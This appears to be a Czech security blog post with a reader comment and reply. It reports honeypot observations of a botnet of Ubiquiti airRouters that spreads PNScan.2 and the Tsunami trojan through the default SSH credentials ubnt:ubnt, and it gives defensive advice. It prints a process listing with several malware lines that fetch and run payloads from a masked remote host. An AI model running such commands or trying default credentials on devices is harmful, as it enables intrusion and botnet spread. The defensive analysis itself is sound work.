Není to tak dlouho, co jsme na základě sledování útočníků v našich telnetových honeypotech odhalili zajímavý botnet složený z domácích routerů značky ASUS. Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris zase nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídají s cookie AIROS_SESSIONID. Tato cookie ukazuje na AirOS bežící na Ubiquiti airRouter. Podle dat ze Shodanu lze touto cookie identifikovat asi 20 % útočících IP adres z celkových cca 6 500 jako AirOS. Mnoho adres ale bývá z dynamických poolů, o kterých Shodan ještě neví.
Botnet velmi rád používá na přihlašování kombinaci jména a hesla ubnt:ubnt (tuto kombinaci nemáme běžně povolenou na SSH honeypotu a neúspěšné pokusy o přihlášení se na webu neukazují). Je to výchozí kombinace právě pro airRouter a evidentně je stále dost kusů, které nemají výchozí nastavení změněno. Navíc SSH port je dostupný z Internetu.
Jeden airRouter jsme si tedy koupili a sledovali, co se stane. Než se útočníci pokusili do routeru přihlásit, uplynulo jenom pár minut. Bylo to, jako vrátit se 10 let zpátky do doby, kdy byl rozšířený červ Sasser. V době jeho největší slávy byly Windows napadeny dříve, než se provedly aktualizace (obejít to šlo jen offline instalací a offline patchem).
Vzorek malware je vzhledem k jeho hlučnosti dost známý – jedná se o PNScan.2, který se botnet pokouší šířit dál. Krátce po instalaci začne napadání dalších strojů. Soubory se seznamem IP adres k útoku se vyznačují tím, že jsou „předscanovány“, tj. útočníci už vědí, že na cílových strojích běží SSH.
Při delším čekání přibudou procesy dalších trojanů postahované od PNScan, většina běžících procesů patří malware:
PID USER VSZ STAT COMMAND [...] 902 ubnt 812 R /usr/bin/ 1005 ubnt 272 S /usr 1209 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1210 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1211 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1212 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1213 ubnt 3632 S /tmp/.xs/daemon.mips.mod 1236 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 1239 ubnt 3564 S ./wras 1240 ubnt 3564 S ./wras 1241 ubnt 3564 S ./wras 1248 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde; 1251 ubnt 3564 S ./hsde 1252 ubnt 3564 S ./hsde 1253 ubnt 3564 S ./hsde 1292 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 1295 ubnt 3564 S ./wras 1296 ubnt 3564 S ./wras 1297 ubnt 3564 S ./wras 1302 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde; 1305 ubnt 3564 S ./hsde 1306 ubnt 3564 S ./hsde 1307 ubnt 3564 S ./hsde 1368 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 1371 ubnt 3564 S ./wras 1372 ubnt 3564 S ./wras 1373 ubnt 3564 S ./wras 1427 ubnt 816 S /usr/bin/ [...]
Méně obvyklé procesy trojanů zobrazované jako „/usr“ a „/usr/bin“ patří trojanu Tsunami. Toto skrývání se dělá obyčejnou změnou argv[0] a je zarážející, proč si útočník nevybral změnu o něco méně nápadnou. Závěr ale není příliš překvapivý: zranitelné zařízení moc dlouho netknuté na Internetu nevydrží.
Pokud tedy tento router vlastníte, zkuste se podívat, co všechno na něm běží za procesy. A pokud si ho hodláte pořídit, doporučujeme ho nejprve nastavit bez připojení do Internetu, nastavit silné heslo a pokud ho opravdu nepotřebujete, vypnout SSH server pro spojení z Internetu.
Dobrý den. Jsou nějaké informace o napadených zařízeních v ČR? Protože vím o několika poskytovatelích (včetně mého domácího, za kterým běží i můj Turris), kteří tato zařízení používají.
Z logů je zaznamenáno 104 českých IP, které zkouší kombinaci ubnt:ubnt. Shodan z nich zná 47, 14 z nich vypadá na airRouter podle AIROS_SESSIONID cookie.